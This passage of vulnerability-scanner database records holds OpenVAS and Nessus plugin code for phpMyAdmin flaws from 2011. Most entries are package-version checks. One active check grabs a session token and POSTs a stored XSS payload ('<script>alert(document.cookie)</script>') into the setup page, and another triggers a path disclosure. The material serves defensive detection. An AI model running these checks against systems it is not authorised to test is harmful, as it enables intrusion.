(CVE-2011-4064).\n \n This upgrade provides the latest phpmyadmin version (3.4.6) to address\n these vulnerabilities.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpmyadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-10/msg00039.php\");\n script_id(831480);\n script_version(\"$Revision: 6565 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 14:56:06 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-31 13:45:00 +0100 (Mon, 31 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"MDVSA\", value: \"2011:158\");\n script_cve_id(\"CVE-2011-3181\", \"CVE-2011-3646\", \"CVE-2011-4064\");\n script_name(\"Mandriva Update for phpmyadmin MDVSA-2011:158 (phpmyadmin)\");\n\n script_summary(\"Check for the Version of phpmyadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpmyadmin\", rpm:\"phpmyadmin~3.4.6~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-12T00:00:00", "published": "2011-10-31T00:00:00", "id": "OPENVAS:1361412562310831480", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831480", "title": "Mandriva Update for phpmyadmin MDVSA-2011:158 (phpmyadmin)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpmyadmin MDVSA-2011:158 (phpmyadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-10/msg00039.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831480\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-31 13:45:00 +0100 (Mon, 31 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"MDVSA\", value:\"2011:158\");\n script_cve_id(\"CVE-2011-3181\", \"CVE-2011-3646\", \"CVE-2011-4064\");\n script_name(\"Mandriva Update for phpmyadmin MDVSA-2011:158 (phpmyadmin)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpmyadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_mes5\");\n script_tag(name:\"affected\", value:\"phpmyadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities has been found and corrected in phpmyadmin:\n\n Missing sanitization on the table, column and index names leads to\n XSS vulnerabilities (CVE-2011-3181).\n\n Firstly, if a row contains javascript code, after inline editing this\n row and saving, the code is executed. Secondly, missing sanitization\n on the db, table and column names leads to XSS vulnerabilities.\n\n When the js_frame parameter of phpmyadmin.css.php is defined as an\n array, an error message shows the full path of this file, leading to\n possible further attacks (CVE-2011-3646).\n\n Crafted values entered in the setup interface can produce XSS. Also,\n if the config directory exists and is writeable, the XSS payload can\n be saved to this directory (CVE-2011-4064).\n\n This upgrade provides the latest phpmyadmin version (3.4.6) to address\n these vulnerabilities.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpmyadmin\", rpm:\"phpmyadmin~3.4.6~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:58", "bulletinFamily": "scanner", "description": "The host is running phpMyAdmin and is prone to cross-site scripting\n vulnerability.", "modified": "2019-02-14T00:00:00", "published": "2011-11-22T00:00:00", "id": "OPENVAS:1361412562310902585", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902585", "title": "phpMyAdmin Setup Interface Cross Site Scripting Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_phpmyadmin_setup_interface_xss_vuln.nasl 13660 2019-02-14 09:48:45Z cfischer $\n#\n# phpMyAdmin Setup Interface Cross Site Scripting Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902585\");\n script_version(\"$Revision: 13660 $\");\n script_cve_id(\"CVE-2011-4064\");\n script_bugtraq_id(50175);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 10:48:45 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-22 17:17:17 +0530 (Tue, 22 Nov 2011)\");\n script_name(\"phpMyAdmin Setup Interface Cross Site Scripting Vulnerability\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to insert arbitrary HTML\n and script code, which will be executed in a user's browser session in the context of an affected site.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin versions 3.4.x before 3.4.6.\");\n script_tag(name:\"insight\", value:\"The flaw is due to improper validation of user-supplied input\n via the 'Servers-0-verbose' parameter to setup/index.php, which allows\n attackers to execute arbitrary HTML and script code in a user's browser\n session in the context of an affected site.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to phpMyAdmin version 3.4.6 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"The host is running phpMyAdmin and is prone to cross-site scripting\n vulnerability.\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/46431\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id/1026199\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/70681\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\");\n script_xref(name:\"URL\", value:\"http://hauntit.blogspot.com/2011/09/stored-xss-in-phpmyadmin-345-all.html\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/downloads.php\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port))exit(0);\n\nhost = http_host_name( port:port );\n\nurl = \"/setup/index.php?tab_hash=&check_page_refresh=1&page=servers&mode=\" +\n \"add&submit=New+server\";\nreq = http_get(item:dir+url, port:port);\nres = http_keepalive_send_recv(port:port, data:req);\n\ncookie = eregmatch(pattern:\"Set-Cookie: ([^;]*);\", string:res);\nif(isnull(cookie[1])) {\n exit(0);\n}\ncookie = cookie[1];\n\ntoken = eregmatch(pattern:'name=\"token\" value=\"([a-zA-Z0-9]+)\"', string:res);\nif(isnull(token[1])) {\n exit(0);\n}\ntoken = token[1];\n\ndata = string(\"tab_hash=&check_page_refresh=1&token=\", token, \"&Servers-0-\",\n \"verbose=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E\",\n \"&Servers-0-host=localhost&Servers-0-port=&Servers-0-socket=&S\",\n \"ervers-0-connect_type=tcp&Servers-0-extension=mysqli&submit_s\",\n \"ave=Save&Servers-0-auth_type=cookie&Servers-0-user=root&Serve\",\n \"rs-0-password=&Servers-0-auth_swekey_config=&Servers-0-auth_h\",\n \"ttp_realm=&Servers-0-SignonSession=&Servers-0-SignonURL=&Serv\",\n \"ers-0-LogoutURL=&Servers-0-only_db=&Servers-0-only_db-userpre\",\n \"fs-allow=on&Servers-0-hide_db=&Servers-0-hide_db-userprefs-al\",\n \"low=on&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-\",\n \"0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowD\",\n \"atabasesCommand=SHOW+DATABASES&Servers-0-pmadb=&Servers-0-con\",\n \"troluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&S\",\n \"ervers-0-bookmarktable=&Servers-0-relation=&Servers-0-usercon\",\n \"fig=&Servers-0-table_info=&Servers-0-column_info=&Servers-0-h\",\n \"istory=&Servers-0-tracking=&Servers-0-table_coords=&Servers-0\",\n \"-pdf_pages=&Servers-0-designer_coords=&Servers-0-tracking_def\",\n \"ault_statements=CREATE+TABLE%2CALTER+TABLE%2CDROP+TABLE%2CREN\",\n \"AME+TABLE%2CCREATE+INDEX%2CDROP+INDEX%2CINSERT%2CUPDATE%2CDEL\",\n \"ETE%2CTRUNCATE%2CREPLACE%2CCREATE+VIEW%2CALTER+VIEW%2CDROP+VI\",\n \"EW%2CCREATE+DATABASE%2CALTER+DATABASE%2CDROP+DATABASE&Servers\",\n \"-0-tracking_add_drop_view=on&Servers-0-tracking_add_drop_tabl\",\n \"e=on&Servers-0-tracking_add_drop_database=on\");\n\nurl = string(dir, '/setup/index.php?tab_hash=&check_page_refresh=1',\n '&token=', token, '&page=servers&mode=add&submit=New+server');\n\nreq = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", http_get_user_agent(), \"\\r\\n\",\n \"Cookie: \", cookie, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(data), \"\\r\\n\\r\\n\", data);\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(res =~ \"^HTTP/1.[01] 30\")\n{\n req = http_get(item:string(dir,\"/setup/index.php\"), port:port);\n req = string(chomp(req), '\\r\\nCookie: ', cookie, '\\r\\n\\r\\n');\n res = http_keepalive_send_recv(port:port, data:req);\n\n if(res =~ \"^HTTP/1\\.[01] 200\" && \"Use SSL (<script>alert(document.cookie)</script>)\" >< res){\n security_message(port);\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-06T16:46:32", "bulletinFamily": "scanner", "description": "The host is running phpMyAdmin and is prone to information\n disclosure vulnerability.", "modified": "2019-12-05T00:00:00", "published": "2011-10-18T00:00:00", "id": "OPENVAS:1361412562310801994", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801994", "title": "phpMyAdmin js_frame Parameter Information Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# phpMyAdmin js_frame Parameter Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801994\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-10-18 15:48:35 +0200 (Tue, 18 Oct 2011)\");\n script_cve_id(\"CVE-2011-3646\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"phpMyAdmin js_frame Parameter Information Disclosure Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.auscert.org.au/render.html?it=14975\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Oct/690\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=746882\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\");\n\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to obtain sensitive\n information that could aid in further attacks.\");\n script_tag(name:\"affected\", value:\"phpMyAdmin version 3.4.5 and prior\");\n script_tag(name:\"insight\", value:\"The flaw is due to insufficient input validation in 'js_frame'\n parameter in 'phpmyadmin.css.php', which allows attackers to disclose\n information that could be used in further attacks.\");\n script_tag(name:\"solution\", value:\"Upgrade to phpMyAdmin 3.4.6 or Apply the patch from the referenced advisory.\");\n script_xref(name:\"URL\", value:\"http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin;a=commitdiff;h=d35cba980893aa6e6455fd6e6f14f3e3f1204c52\");\n script_tag(name:\"summary\", value:\"The host is running phpMyAdmin and is prone to information\n disclosure vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/downloads.php\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))exit(0);\n\nif(dir = get_app_location(cpe:CPE, port:port))\n{\n url = dir + \"/phpmyadmin.css.php?js_frame[]=right\";\n\n if(http_vuln_check(port:port, url:url, check_header: TRUE,\n pattern:\"Cannot modify header information.*/phpmyadmin.css.php\")) {\n security_message(port);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2019-12-13T07:03:28", "bulletinFamily": "scanner", "description": "Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg[", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2011-15460.NASL", "href": "https://www.tenable.com/plugins/nessus/56797", "published": "2011-11-14T00:00:00", "title": "Fedora 16 : phpMyAdmin-3.4.7-1.fc16 (2011-15460)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-15460.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56797);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/08/02 13:32:34\");\n\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_xref(name:\"FEDORA\", value:\"2011-15460\");\n\n script_name(english:\"Fedora 16 : phpMyAdmin-3.4.7-1.fc16 (2011-15460)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after\n closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 (2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum\n fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested\n table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display\n options\n\n - [display] Broken binary column when 'Show binary\n contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created\n on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is\n broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability,\n see PMASA-2011-15=\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter),\n see PMASA-2011-= 16\n (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-15/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-16/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=746880\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069235.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?83c637df\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"phpMyAdmin-3.4.7-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T07:03:28", "bulletinFamily": "scanner", "description": "Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg[", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2011-15472.NASL", "href": "https://www.tenable.com/plugins/nessus/56799", "published": "2011-11-14T00:00:00", "title": "Fedora 14 : phpMyAdmin-3.4.7-1.fc14 (2011-15472)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-15472.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56799);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/08/02 13:32:34\");\n\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_xref(name:\"FEDORA\", value:\"2011-15472\");\n\n script_name(english:\"Fedora 14 : phpMyAdmin-3.4.7-1.fc14 (2011-15472)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after\n closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 (2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum\n fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested\n table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display\n options\n\n - [display] Broken binary column when 'Show binary\n contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created\n on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is\n broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability,\n see PMASA-2011-15=\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter),\n see PMASA-2011-= 16\n (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-15/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-16/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=746880\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069234.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3f737dee\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", 